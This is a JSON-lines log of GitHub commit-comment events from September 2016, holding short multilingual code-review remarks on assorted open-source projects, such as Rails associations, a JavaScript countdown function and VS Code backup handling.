{"id":"4577722583","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"e-mc2/thinknetica-rails"},"payload":{"comment":{"id":19064255,"position":3,"line":3,"path":"app/models/schedule.rb","commit_id":"7e7c1275b8580e32e3789db393f6dc7e25893f6d","created_at":"2016-09-17T10:14:50Z","updated_at":"2016-09-17T10:14:50Z","body":"Здесь должно быть ед. ч.  От этого и ошибка. Соблюдение ед. ч и мн. ч в названии ассоциаций очень важно, т.к. по ним идет поиск названий классов. "}},"created_at":"2016-09-17T10:14:50Z"}
{"id":"4577723710","type":"CommitCommentEvent","actor":{"login":"yangyadong"},"repo":{"name":"yangyadong/stock_trade"},"payload":{"comment":{"id":19064257,"position":null,"line":null,"path":null,"commit_id":"6bd4a828f94252b832510094b1b5f84fd2dfccaa","created_at":"2016-09-17T10:15:45Z","updated_at":"2016-09-17T10:15:45Z","body":"回滚"}},"created_at":"2016-09-17T10:15:45Z"}
{"id":"4577725253","type":"CommitCommentEvent","actor":{"login":"araghunde"},"repo":{"name":"araghunde/ds"},"payload":{"comment":{"id":19064261,"position":26,"line":132,"path":"ds_git/src/ejercicio1/Rectangulo.java","commit_id":"212148d511eaae17ad86b7a036292a99faf5e40e","created_at":"2016-09-17T10:16:57Z","updated_at":"2016-09-17T10:16:57Z","body":"testing the method 👍 "}},"created_at":"2016-09-17T10:16:57Z"}
{"id":"4577729165","type":"CommitCommentEvent","actor":{"login":"aKalisch"},"repo":{"name":"iseekwonderful/csgoGlow"},"payload":{"comment":{"id":19064265,"position":4,"line":21,"path":"Wall/main.cpp","commit_id":"fdf660197de7983d340f837b058f51fee639c849","created_at":"2016-09-17T10:20:11Z","updated_at":"2016-09-17T10:20:11Z","body":"That sucks. You commit something without testing.\r\n\r\nPlease correct the code and commit again!"}},"created_at":"2016-09-17T10:20:11Z"}
{"id":"4577730178","type":"CommitCommentEvent","actor":{"login":"meersjo"},"repo":{"name":"dankow/ansible-mysql-cve-2016-6662"},"payload":{"comment":{"id":19064266,"position":null,"line":null,"path":null,"commit_id":"02cf708ed12dff30978bdfbd607a8bc04c641953","created_at":"2016-09-17T10:20:58Z","updated_at":"2016-09-17T10:20:58Z","body":"Ah, I see. In that case I do agree that my_print_defaults would be better; and I also stand corrected on it's ability to print the datadir."}},"created_at":"2016-09-17T10:20:58Z"}
{"id":"4577733455","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064268,"position":null,"line":null,"path":null,"commit_id":"8f9618ebc7880f3368d5112d0f14079c9181e3f4","created_at":"2016-09-17T10:23:42Z","updated_at":"2016-09-17T10:23:42Z","body":" 알고리즘상\r\n```\r\ngetTimeRemaining(endtime){\r\n  let total = Date.parse(endtime) - Date.parse(new Date());\r\n  let seconds = Math.floor( (total/1000) % 60 );\r\n  let minutes = Math.floor( (total/1000/60) % 60 );\r\n  let hours = Math.floor( (total/(1000*60*60)) % 24 );\r\n  let days = Math.floor( total/(1000*60*60*24) );\r\n  return {\r\n    'total' : total,\r\n    'days' : days,\r\n    'hours': hours,\r\n    'minutes': minutes,\r\n    'seconds': seconds\r\n  }\r\n}\r\n```\r\n보다는 아래 코드가 더 연산속도와 가독성이 좋지 않나 싶은데, 어떻나요?\r\n```\r\ngetTimeRemaining(endtime) {\r\n  let total = Date.parse(endtime) - Date.parse(new Date());\r\n  let seconds = Math.floor(total/1000);\r\n  let minutes = Math.floor(seconds/60);\r\n  let hours = Math.floor(minutes/60);\r\n  let days = Math.floor(hours/24);\r\n  return {\r\n    'total' : total,\r\n    'seconds': seconds%60\r\n    'minutes': minutes%60,\r\n    'hours': hours%24,\r\n    'days' : days,\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-17T10:23:42Z"}
{"id":"4577736872","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/hmi"},"payload":{"comment":{"id":19064273,"position":null,"line":null,"path":null,"commit_id":"3d516eb0ff3cbfd24740737b6658c7296dfcfc45","created_at":"2016-09-17T10:26:25Z","updated_at":"2016-09-17T10:26:25Z","body":"Fixes #2"}},"created_at":"2016-09-17T10:26:25Z"}
{"id":"4577737743","type":"CommitCommentEvent","actor":{"login":"AndrewBelt"},"repo":{"name":"hackutk/constitution"},"payload":{"comment":{"id":19064275,"position":null,"line":null,"path":null,"commit_id":"e90e89da980516c95c1c483a258348974ede134d","created_at":"2016-09-17T10:27:06Z","updated_at":"2016-09-17T10:27:06Z","body":"Lol"}},"created_at":"2016-09-17T10:27:06Z"}
{"id":"4577741074","type":"CommitCommentEvent","actor":{"login":"richardju97"},"repo":{"name":"richardju97/python_scripts"},"payload":{"comment":{"id":19064278,"position":null,"line":null,"path":null,"commit_id":"591dc945f7d691f134893c00f9ac04ce5ded2dc4","created_at":"2016-09-17T10:29:50Z","updated_at":"2016-09-17T10:29:50Z","body":"Transitioning to object oriented for modularity."}},"created_at":"2016-09-17T10:29:50Z"}
{"id":"4577743142","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064280,"position":null,"line":null,"path":null,"commit_id":"b2a4440b8ca514b9bd79ccb63619ede26b94122b","created_at":"2016-09-17T10:31:27Z","updated_at":"2016-09-17T10:31:27Z","body":"难道那个lua你放着不管了么"}},"created_at":"2016-09-17T10:31:27Z"}
{"id":"4577745502","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064281,"position":7,"line":0,"path":"src/package/standard-cards.cpp","commit_id":"ce5e412f1c9edbe55b34f4613f7d25d339dad70d","created_at":"2016-09-17T10:33:20Z","updated_at":"2016-09-17T10:33:20Z","body":"技能卡没必要setobjectname，你看别的哪个技能卡设置了。。。。\n不过这张卡应该叫TribladeCard，不该叫TribladeSkillCard"}},"created_at":"2016-09-17T10:33:20Z"}
{"id":"4577745893","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/teutoburg"},"payload":{"comment":{"id":19064282,"position":null,"line":null,"path":null,"commit_id":"28ba935145216fed628e96fed1321ef75aa0aa6b","created_at":"2016-09-17T10:33:43Z","updated_at":"2016-09-17T10:33:43Z","body":"Nice! Ich werd noch ein paar Namen fixen, aber für jetzt passts. Das Bild mit der Schlacht ist aber auf dem Kartenhintergrund schlecht zu sehen.\r\n\r\nÜbrigens sollten die Commitmessages kürzer sein und im Imperativ, z.B. \"Add pictures\", ... für die Info bzgl. der Präsentation kannst du in dem Pull Request nen Kommentar lassen.\r\n\r\nWer ist **Armenius**? lol"}},"created_at":"2016-09-17T10:33:43Z"}
{"id":"4577746624","type":"CommitCommentEvent","actor":{"login":"JohnKim"},"repo":{"name":"JohnKim/stalk.messenger"},"payload":{"comment":{"id":19064283,"position":null,"line":null,"path":null,"commit_id":"22f4e02e5230d63af639175d53d9e20e70e3775e","created_at":"2016-09-17T10:34:20Z","updated_at":"2016-09-17T10:34:20Z","body":"babel 관련 설정은 제거 함. \r\n그리고 babel 로 동작하는 scripts 폴더의 스크립트들도 모두 제거함.\r\n\r\nbabel 작업하는 것이 컴파일하고 동작하는데 이슈가 발생하는 것으로 보임. ㅠㅜ "}},"created_at":"2016-09-17T10:34:20Z"}
{"id":"4577746693","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/robot_smach_states"},"payload":{"comment":{"id":19064286,"position":null,"line":null,"path":null,"commit_id":"8bcd44f0228cba6a73fef0b59576d639c1fb2843","created_at":"2016-09-17T10:34:24Z","updated_at":"2016-09-17T10:34:24Z","body":"Fixes #52"}},"created_at":"2016-09-17T10:34:24Z"}
{"id":"4577747646","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19064287,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-17T10:35:11Z","updated_at":"2016-09-17T10:35:11Z","body":"Indeed. Most likely https://github.com/JuliaLang/julia/pull/18520 or https://github.com/JuliaLang/julia/pull/18493 or https://github.com/JuliaLang/julia/pull/18467 ?"}},"created_at":"2016-09-17T10:35:11Z"}
{"id":"4577749841","type":"CommitCommentEvent","actor":{"login":"JohnKim"},"repo":{"name":"JohnKim/stalk.messenger"},"payload":{"comment":{"id":19064291,"position":null,"line":null,"path":null,"commit_id":"7587e24836ccd7405712f566c3ca7142ebf00aed","created_at":"2016-09-17T10:36:49Z","updated_at":"2016-09-17T10:36:49Z","body":"0.33 으로 다시 작업했음."}},"created_at":"2016-09-17T10:36:49Z"}
{"id":"4577750674","type":"CommitCommentEvent","actor":{"login":"lwtmusou"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064292,"position":null,"line":null,"path":null,"commit_id":"b2a4440b8ca514b9bd79ccb63619ede26b94122b","created_at":"2016-09-17T10:37:30Z","updated_at":"2016-09-17T10:37:30Z","body":"没精力 为之奈何 这个暂时能用就用"}},"created_at":"2016-09-17T10:37:30Z"}
{"id":"4577750995","type":"CommitCommentEvent","actor":{"login":"Umang96"},"repo":{"name":"CM-FK/android_kernel_xiaomi_msm8956"},"payload":{"comment":{"id":19064293,"position":null,"line":null,"path":null,"commit_id":"fdf5f6a851a201618399dc06485d9da3868c6fbb","created_at":"2016-09-17T10:37:49Z","updated_at":"2016-09-17T10:37:49Z","body":"Actually I just kept sre and removed cabc because cabc causes that blue screen on boot and screen flickering issues, but sre doesn't cause any problems."}},"created_at":"2016-09-17T10:37:49Z"}
{"id":"4577751305","type":"CommitCommentEvent","actor":{"login":"uldisn"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19064294,"position":null,"line":null,"path":null,"commit_id":"cbe3741418b746fca59beb521a80794d1edc3a26","created_at":"2016-09-17T10:38:03Z","updated_at":"2016-09-17T10:38:03Z","body":"If no setted generateRelationsFromCurrentSchema = false, in model do not generate relation when entered one table name. I use GUI for generation."}},"created_at":"2016-09-17T10:38:03Z"}
{"id":"4577751440","type":"CommitCommentEvent","actor":{"login":"BigDataGal"},"repo":{"name":"BigDataGal/Python-for-Data-Science"},"payload":{"comment":{"id":19064295,"position":null,"line":null,"path":null,"commit_id":"1f49aacfd087fd3bd9fbe6e46a0c91dd89abced2","created_at":"2016-09-17T10:38:10Z","updated_at":"2016-09-17T10:38:10Z","body":"Correction - From 'car' package: https://cran.r-project.org/web/packages/car/car.pdf"}},"created_at":"2016-09-17T10:38:10Z"}
{"id":"4577751609","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/tue_manipulation"},"payload":{"comment":{"id":19064296,"position":null,"line":null,"path":null,"commit_id":"7b50e528e5985dd054c687a046ace492aac784f2","created_at":"2016-09-17T10:38:17Z","updated_at":"2016-09-17T10:38:17Z","body":"Fixes #3"}},"created_at":"2016-09-17T10:38:17Z"}
{"id":"4577752684","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19064297,"position":null,"line":null,"path":null,"commit_id":"4e0a0bce43609876f2892f1dfb57e6b629f7dec4","created_at":"2016-09-17T10:39:11Z","updated_at":"2016-09-17T10:39:11Z","body":"Now, everything is fine regarding the formatting part.\r\n\r\nBut, you have to do the following things,\r\n- List the clubs in alphabetical order (sorted by name).\r\n- Try to make a clean layout of the SAC Office Bearers panel.\r\n- Add comments (for societies) in the SAC INFO Tab as well (inside SAC Office Bearers and Dean's Nominee Accordion."}},"created_at":"2016-09-17T10:39:11Z"}
{"id":"4577753993","type":"CommitCommentEvent","actor":{"login":"lwtmusou"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064299,"position":7,"line":0,"path":"src/package/standard-cards.cpp","commit_id":"ce5e412f1c9edbe55b34f4613f7d25d339dad70d","created_at":"2016-09-17T10:40:22Z","updated_at":"2016-09-17T10:40:22Z","body":"技能  TribladeSkill  习惯性的就直接后面加card了"}},"created_at":"2016-09-17T10:40:22Z"}
{"id":"4577754655","type":"CommitCommentEvent","actor":{"login":"cristeamdev"},"repo":{"name":"cristeamdev/Unyson-Events-Extension"},"payload":{"comment":{"id":19064300,"position":null,"line":null,"path":null,"commit_id":"340e08d87adacf738f0b5378a976d9482cc6815b","created_at":"2016-09-17T10:40:55Z","updated_at":"2016-09-17T10:40:55Z","body":"Sometimes happens that the parent events was removed but the delete action was not triggered, so child `fw-event-search` posts are remaining and the calendar is showing non-existent events."}},"created_at":"2016-09-17T10:40:55Z"}
{"id":"4577755138","type":"CommitCommentEvent","actor":{"login":"barisusakli"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19064301,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-17T10:41:22Z","updated_at":"2016-09-17T10:41:22Z","body":"https://github.com/NodeBB/nodebb-plugin-composer-default/commit/eeb9ce0826851a42b2252c07ae1ab5b337272c3a "}},"created_at":"2016-09-17T10:41:22Z"}
{"id":"4577755992","type":"CommitCommentEvent","actor":{"login":"lwtmusou"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19064305,"position":null,"line":null,"path":null,"commit_id":"46f66733702058ebe9ca50340ad69997607ec3d2","created_at":"2016-09-17T10:42:09Z","updated_at":"2016-09-17T10:42:09Z","body":"干掉 有些点子 可以回收以后用 虽然不多：【倍杀】【倾仓】和改胜利条件"}},"created_at":"2016-09-17T10:42:09Z"}
{"id":"4577756483","type":"CommitCommentEvent","actor":{"login":"kuh9325"},"repo":{"name":"likelion-kau1/malangKau"},"payload":{"comment":{"id":19064310,"position":null,"line":null,"path":null,"commit_id":"33fa9df65c1591d74d6fd6bc1dab85f8ad7e37eb","created_at":"2016-09-17T10:42:36Z","updated_at":"2016-09-17T10:42:36Z","body":"devise 최신버젼이 상위버젼의 루비를 요구하는데, 로컬 맥에서는 rbenv로 루비를 판올림하면 번들러 에러가 생겨서 결국 확인할수가 없네... 번들러 오류나는 이유를 알아야 할듯"}},"created_at":"2016-09-17T10:42:36Z"}
{"id":"4577756978","type":"CommitCommentEvent","actor":{"login":"lucasart"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19064313,"position":null,"line":null,"path":null,"commit_id":"92f01aa2bd2b4e9644323cdbef8621682605660d","created_at":"2016-09-17T10:42:59Z","updated_at":"2016-09-17T10:42:59Z","body":"Wouldn't it be a better fix to disable this silly warning ? Original code was more readable, and this warning is essentially silly."}},"created_at":"2016-09-17T10:42:59Z"}
{"id":"4577758740","type":"CommitCommentEvent","actor":{"login":"Siedlerchr"},"repo":{"name":"JabRef/help.jabref.org"},"payload":{"comment":{"id":19064316,"position":1,"line":1,"path":"it/CiteSeerHelp.md","commit_id":"e0a9ba70c99289f87018914eef944d7c6cda38e8","created_at":"2016-09-17T10:44:33Z","updated_at":"2016-09-17T10:44:33Z","body":"Sure we need those pages with HelpSuffixes in ne lang files?"}},"created_at":"2016-09-17T10:44:33Z"}
{"id":"4577759071","type":"CommitCommentEvent","actor":{"login":"Jae-Yong"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064317,"position":null,"line":null,"path":null,"commit_id":"8f9618ebc7880f3368d5112d0f14079c9181e3f4","created_at":"2016-09-17T10:44:52Z","updated_at":"2016-09-17T10:44:52Z","body":"localization을 고려한다면 [moment.js](http://momentjs.com) 같은 library 사용은 어떤가요?\r\n```\r\nmoment().format('LLLL'); // 2016년 9월 17일 토요일 오후 7시 42분\r\nmoment().format('LLLL'); // Saturday, September 17, 2016 7:42 PM\r\n```\r\n그리고 moment에서 [fromNow](http://momentjs.com/docs/#/displaying/fromnow/)를 지원하지만,\r\n`moment([2007, 0, 29]).fromNow(); // 4 years ago`\r\n기간이 길 경우, 축약해서 나온다는 점 때문에 document를 좀 더 봐야할것 같습니다."}},"created_at":"2016-09-17T10:44:52Z"}
{"id":"4577761968","type":"CommitCommentEvent","actor":{"login":"K-Phoen"},"repo":{"name":"ovr/phpsa"},"payload":{"comment":{"id":19064318,"position":null,"line":null,"path":null,"commit_id":"558809a395899532c9e57f81f91a3dd61afc0983","created_at":"2016-09-17T10:47:17Z","updated_at":"2016-09-17T10:47:17Z","body":"That's an habit of mine: I always use `static`, strict equalities, …\r\n\r\nWhat about redacting a contributing guide to make the code conventions explicit? I don't know if it's possible, but having scrutinizer check for these conventions would be awesome too."}},"created_at":"2016-09-17T10:47:17Z"}
{"id":"4577763267","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19064319,"position":28,"line":805,"path":"src/node_jsvmapi.cc","commit_id":"b2b66198a7449a923d99a5078e021d85047c90d1","created_at":"2016-09-17T10:48:14Z","updated_at":"2016-09-17T10:48:14Z","body":"Does that mean node-nanomsg won't work with this implementation?  If so, is it possible to emulate v6.2's napi_buffer_new behavior?"}},"created_at":"2016-09-17T10:48:14Z"}
{"id":"4577763797","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19064321,"position":15,"line":122,"path":"src/vs/workbench/parts/files/common/textFileService.ts","commit_id":"ce42316e28713a74c198373b6f8ec3ce887560c3","created_at":"2016-09-17T10:48:42Z","updated_at":"2016-09-17T10:48:42Z","body":"@Tyriar fyi I think this is not a good place to actually store backups of dirty buffers. for one, shutdown phase is a timing sensitive path that can lead into the OS killing the process if the operation takes long. then, this code would have to be moved to a different place to support the crash recovery feature.\r\n\r\nI would maybe start to move this into the text file model manager or the dirtyFileTracker.ts and start to listen for models becoming dirty. With a short buffer/delay, backup files once they get dirty (this should also include untitled files, not just real existing files).\r\n\r\nThat way, there is no pressure on shutdown and we always store backups for dirty files. The backups should be deleted once the file gets saved or the file gets deleted. "}},"created_at":"2016-09-17T10:48:42Z"}
{"id":"4577764396","type":"CommitCommentEvent","actor":{"login":"danyshaanan"},"repo":{"name":"danyshaanan/node"},"payload":{"comment":{"id":19064325,"position":null,"line":null,"path":null,"commit_id":"7ff5dfd0b9afde3dcf7a3a2c19d86b6f8ef42ed9","created_at":"2016-09-17T10:49:14Z","updated_at":"2016-09-17T10:49:14Z","body":"```bash\r\nTIMING=1 ./node tools/eslint/bin/eslint.js --cache --rulesdir=tools/eslint-rules benchmark/ lib/ test/ tools/\r\n```"}},"created_at":"2016-09-17T10:49:14Z"}
{"id":"4577764553","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19064326,"position":286,"line":376,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-17T10:49:23Z","updated_at":"2016-09-17T10:49:23Z","body":"Gotcha"}},"created_at":"2016-09-17T10:49:23Z"}
{"id":"4577765532","type":"CommitCommentEvent","actor":{"login":"tusharg90"},"repo":{"name":"tusharg90/java"},"payload":{"comment":{"id":19064328,"position":null,"line":null,"path":null,"commit_id":"40ea19b894e7cbc20f7ec35e2447fb14894e9fd0","created_at":"2016-09-17T10:50:14Z","updated_at":"2016-09-17T10:50:14Z","body":"asdf"}},"created_at":"2016-09-17T10:50:14Z"}
{"id":"4577765726","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"phplang/phack"},"payload":{"comment":{"id":19064329,"position":29,"line":117,"path":"lib/PhpParser/Lexer/HackLang.php","commit_id":"8ea441061d1c83cdbbccb12040a97c9e4212ef22","created_at":"2016-09-17T10:50:24Z","updated_at":"2016-09-17T10:50:24Z","body":"Doesn't even need the `??null`, because you can $token[0] is just a no-op for single-char tokens :)"}},"created_at":"2016-09-17T10:50:24Z"}
{"id":"4577765796","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"Simn/haxe"},"payload":{"comment":{"id":19064330,"position":null,"line":null,"path":null,"commit_id":"4bd00d8e9666a8e9ec760ca7ad4934064983624a","created_at":"2016-09-17T10:50:29Z","updated_at":"2016-09-17T10:50:29Z","body":"wait doesn't that break the \"use default dependency\" behaviour?"}},"created_at":"2016-09-17T10:50:29Z"}
{"id":"4577766449","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"Simn/haxe"},"payload":{"comment":{"id":19064331,"position":null,"line":null,"path":null,"commit_id":"4bd00d8e9666a8e9ec760ca7ad4934064983624a","created_at":"2016-09-17T10:51:05Z","updated_at":"2016-09-17T10:51:05Z","body":"Dammit"}},"created_at":"2016-09-17T10:51:05Z"}
{"id":"4577767941","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19064332,"position":19,"line":52,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-17T10:52:21Z","updated_at":"2016-09-17T10:52:21Z","body":"Not directly no.  We should make a note of this and then leave it unless we come across a module that does have a problem with this.  v0.10 isn't a priority but this is a good example case of where the napi abstraction fails to work as a generalized API.\r\n\r\nCan you add a comment about this in the header file in the master branch?"}},"created_at":"2016-09-17T10:52:21Z"}
{"id":"4577768728","type":"CommitCommentEvent","actor":{"login":"a1988105"},"repo":{"name":"a1988105/GitHutTest"},"payload":{"comment":{"id":19064333,"position":2,"line":2,"path":"index.html","commit_id":"88cc7603a0523ec4397a130d7539438a7e1bb4a6","created_at":"2016-09-17T10:52:58Z","updated_at":"2016-09-17T10:52:58Z","body":"add alert function "}},"created_at":"2016-09-17T10:52:58Z"}
{"id":"4577768991","type":"CommitCommentEvent","actor":{"login":"boomzillawtf"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19064334,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-17T10:53:11Z","updated_at":"2016-09-17T10:53:11Z","body":"It should be an easy enough fix: `overflow-x:auto`"}},"created_at":"2016-09-17T10:53:11Z"}
{"id":"4577769772","type":"CommitCommentEvent","actor":{"login":"shapiro2"},"repo":{"name":"eulerto/pg_similarity"},"payload":{"comment":{"id":19064335,"position":null,"line":null,"path":null,"commit_id":"be1a8b08c8716e59b89982557da9ea68cdf868c5","created_at":"2016-09-17T10:53:56Z","updated_at":"2016-09-17T10:53:56Z","body":"Line 86 looks wrong to me"}},"created_at":"2016-09-17T10:53:56Z"}
{"id":"4577769940","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19064336,"position":null,"line":null,"path":null,"commit_id":"342ff83c2cd330b8638f59e9e482c974e2fd4c05","created_at":"2016-09-17T10:54:06Z","updated_at":"2016-09-17T10:54:06Z","body":"Maybe we should add a check for the existence of the variable, in the tests.\r\nhttps://github.com/Inist-CNRS/ezmaster/blob/master/test/testFakeapp-ezmasterized.js#L119-L141"}},"created_at":"2016-09-17T10:54:06Z"}
{"id":"4577770485","type":"CommitCommentEvent","actor":{"login":"Tyriar"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19064338,"position":15,"line":122,"path":"src/vs/workbench/parts/files/common/textFileService.ts","commit_id":"ce42316e28713a74c198373b6f8ec3ce887560c3","created_at":"2016-09-17T10:54:34Z","updated_at":"2016-09-17T10:54:34Z","body":"Sounds good, I'll shuffle things around on Monday"}},"created_at":"2016-09-17T10:54:34Z"}
{"id":"4577772233","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19064339,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-17T10:56:05Z","updated_at":"2016-09-17T10:56:05Z","body":"Also could you try to add this to fix data:\r\n# RIL symbols\r\nPRODUCT_PACKAGES += \\\r\n     liblge"}},"created_at":"2016-09-17T10:56:05Z"}
{"id":"4577773640","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"oe-alliance/e2openplugins"},"payload":{"comment":{"id":19064340,"position":null,"line":null,"path":null,"commit_id":"28d18eb019211edaa92f9e539a7dd27cfcfa63c0","created_at":"2016-09-17T10:57:19Z","updated_at":"2016-09-17T10:57:19Z","body":"I hope https://github.com/oe-alliance/e2openplugins/commit/6a33d5b0466f032ddaece6737ed82a18b33b78f6 does the trick."}},"created_at":"2016-09-17T10:57:19Z"}
{"id":"4577774505","type":"CommitCommentEvent","actor":{"login":"ddmler"},"repo":{"name":"ovr/phpsa"},"payload":{"comment":{"id":19064341,"position":null,"line":null,"path":null,"commit_id":"558809a395899532c9e57f81f91a3dd61afc0983","created_at":"2016-09-17T10:58:07Z","updated_at":"2016-09-17T10:58:07Z","body":"@ovr @K-Phoen :+1: for Contributing guide"}},"created_at":"2016-09-17T10:58:07Z"}
{"id":"4577774893","type":"CommitCommentEvent","actor":{"login":"barisusakli"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19064343,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-17T10:58:25Z","updated_at":"2016-09-17T10:58:25Z","body":"I just did that :laughing: eeb9ce0"}},"created_at":"2016-09-17T10:58:25Z"}
{"id":"4577775344","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19064344,"position":4,"line":4,"path":"src/node_jsvmapi_types.h","commit_id":"d167e60950ea4219228acd54a30702540f77953a","created_at":"2016-09-17T10:58:53Z","updated_at":"2016-09-17T10:58:53Z","body":"Yes.  Modules include this file into their sources and it isn't playing nice to force upon them `#define nullptr NULL`.  They may not want that.  Since this is just a convenience to get the code compiling in the older version of node, this should go into the .cc file rather than the public API header."}},"created_at":"2016-09-17T10:58:53Z"}
{"id":"4577775866","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"Noahb930/nha-oop-fall-2016"},"payload":{"comment":{"id":19064345,"position":69,"line":115,"path":"homework-1.html","commit_id":"e0b91211216cdc891f8dfa2123394436e75aaaba","created_at":"2016-09-17T10:59:16Z","updated_at":"2016-09-17T10:59:16Z","body":"@Noahb930 Looks like you merged without reading my notes."}},"created_at":"2016-09-17T10:59:16Z"}
{"id":"4577777003","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19064346,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-17T11:00:08Z","updated_at":"2016-09-17T11:00:08Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.170](http://build.clear-measure.com/viewLog.html?buildId=10467&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-17T11:00:08Z"}
{"id":"4577780989","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19064348,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-17T11:02:39Z","updated_at":"2016-09-17T11:02:39Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.170](http://build.clear-measure.com/viewLog.html?buildId=10467&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:31"}},"created_at":"2016-09-17T11:02:39Z"}
{"id":"4577782382","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19064349,"position":31,"line":250,"path":"truffle/src/main/ruby/core/type.rb","commit_id":"41e28fd827c259fc5f81697ba98a3f4af5561526","created_at":"2016-09-17T11:03:55Z","updated_at":"2016-09-17T11:03:55Z","body":"This could be just kind_of?(Integer)"}},"created_at":"2016-09-17T11:03:55Z"}
{"id":"4577783377","type":"CommitCommentEvent","actor":{"login":"aDevilInMe"},"repo":{"name":"ThePhD/lua-bench"},"payload":{"comment":{"id":19064350,"position":null,"line":null,"path":null,"commit_id":"a7925e830a7bb3e7ce6d2d4ca9c5cd5b3ddbc048","created_at":"2016-09-17T11:04:50Z","updated_at":"2016-09-17T11:04:50Z","body":"OOLua does support member variables http://oolua.org/docs/_o_o_lua_proxying.html#ClassPublicMembers"}},"created_at":"2016-09-17T11:04:50Z"}
{"id":"4577783618","type":"CommitCommentEvent","actor":{"login":"lieff"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19064352,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T11:05:01Z","updated_at":"2016-09-17T11:05:01Z","body":"Или на std::list<std::string>. Ну так замени)"}},"created_at":"2016-09-17T11:05:01Z"}
{"id":"4577783630","type":"CommitCommentEvent","actor":{"login":"ArmyArmyCz"},"repo":{"name":"Rusketh/ExpAdv2"},"payload":{"comment":{"id":19064353,"position":null,"line":null,"path":null,"commit_id":"bba095961f5374263deaca9195b9c9543d9db069","created_at":"2016-09-17T11:05:02Z","updated_at":"2016-09-17T11:05:02Z","body":"Looking into this, @oskar94 I think you broke hsv2rgb, it's not suposed to work like that...\r\nHSVToColor( number hue, number saturation, number value )"}},"created_at":"2016-09-17T11:05:02Z"}
